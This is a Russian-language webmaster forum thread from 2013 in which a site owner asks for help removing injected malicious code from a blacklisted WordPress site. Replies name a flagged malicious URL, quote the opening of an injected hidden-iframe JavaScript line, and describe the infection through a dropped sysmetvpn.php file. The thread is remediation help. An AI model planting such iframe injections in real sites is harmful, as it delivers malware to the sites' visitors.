Сайт везде блокируется и занесен в бан лист. Но вредоносный кот я найти не могу, помогите умоляю
Сайт: _thingdreams.ru
08.09.2013 12:18- 0
- 08.09.2013 13:30
каспер блокирует загрузку вот этой ссылки
08.09.2013 14:28:38 Opera Internet Browser Запрещено: _http://mqpf.bazeratincomers.info/ (проверка по базе подозрительных веб-адресов) Ссылка обнаружена в базе
переходить по ней я не советую.- 0
- 08.09.2013 14:01Опытный
- Регистрация: 28.08.2012
- Сообщений: 289
- Репутация: 7
Delpix, ищите именно в шаблоне гл. страницы,что-то типа <iframe ...
- 0
- 08.09.2013 14:29Дипломник
- Регистрация: 13.01.2013
- Сообщений: 182
- Репутация: 41
Delpix, посмотрел, скорее всего у тебя вирусы находятся в :
/home/endid100/public_html/wp-content/themes/designpile/index.php Посмотри этот файл хорошо. Потому что все онлайн антивирусы ссылаются на этот файл.- 0
- 08.09.2013 14:53
Delpix, удаляем все, начиная с
PHP код:в файлеvar ifl6OB = document.createElement('iframe');ifl6OB.name = 'ifl6OB';ifl6OB.src
Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 150 сообщение(ий)):У вас нет прав чтобы видеть скрытый текст, содержащийся здесь.
---------- Сообщение добавлено 12:53 ---------- Предыдущее 12:44 ----------
Забыл добавить, если на этом же аккаунте хостинга лежат еще сайты на вп, то проверяйте и остальные (файл тот же, может только отличаться версией). Тоже самое касается джумлы (но скрипт может лежать где-угодно в модулях).- 1
Спасибо сказали:
Delpix(08.09.2013), - 08.09.2013 16:08
Delpix, готов Вам помочь. Обращайтесь в ЛС или пишите в скайп: web-master-krd
- 0
- 08.09.2013 16:13
liveman,Удалил, спасибо. Подробнее не расскажете что это? и как оно туда попало?
- 0
- 08.09.2013 16:32
Delpix, можете подолбить хостлайф (на котором хоститесь) с вопросом "словил известный вам вирус, который размещается в яваскриптах, решается ли данная проблема и если решена помогите закрыть дырку" типа такого. Хотя они о проблеме знают. Вкратце - проникновение через их, создается файлик sysmetvpn.php и далее правится файл .js. Данная проблема существует на многих хостингах.
---------- Сообщение добавлено 14:32 ---------- Предыдущее 14:27 ----------
Ну и как временное решение - заменить название исполняемых js-файлов на другие, включая папки. (правда поможет только на время)- 1
Спасибо сказали:
Delpix(08.09.2013), - 08.09.2013 16:46
liveman,В данный момент я все удалил? Переход на более защищенный хост поможет?
- 0
- 08.09.2013 16:50Дипломник
- Регистрация: 15.01.2012
- Сообщений: 179
- Репутация: 39
Delpix, попробуйте еще осуществить поиск данной ссылки по самой базе обычным sql-запросом. 1) Заходите в пхпмайадмин 2) Делаете дамп базы 3) ищите искомую ссылку, о которой писал уважаемый cOAPerator.
- 0
Тэги топика:
Похожие темы
| Темы | Раздел | Ответов | Последний пост |
|---|---|---|---|
Помогите найти вредоносный код. | Web программирование | 11 | 04.10.2012 13:38 |
Помогите найти вредоносный код | Web программирование | 5 | 10.04.2012 17:04 |
Помогите найти вредоносный код | Вопросы от новичков | 4 | 10.04.2012 02:12 |
Помогите пожалуйста найти и удалить вредоносный код на сайте | Web программирование | 5 | 30.10.2011 04:03 |
Помогите пожалуйста найти и удалить вредоносный код на сайте | Вопросы от новичков | 1 | 26.09.2011 11:19 |
addurl adsense instagram proxy telegram vkontakte youtube zennoposter аккаунт база бесплатный блог быть витрина вконтакт вопрос гугл добавить домен есть запрос кейс ключ купить лицензия магазин можно накрутка новый отзыв парсер партнёрка плагин поинтовый пользователь порно портал продажа прокси работа работать регистрация сайт сеть скрипт создание софт ссылка стать статья стоимость тариф текст тема трафик услуга форум цель цена шаблон
Тем:
77,527Сообщений:
762,149Пользователей:
30,079Сейчас на сайте:
0 пользователей и 89 гостей
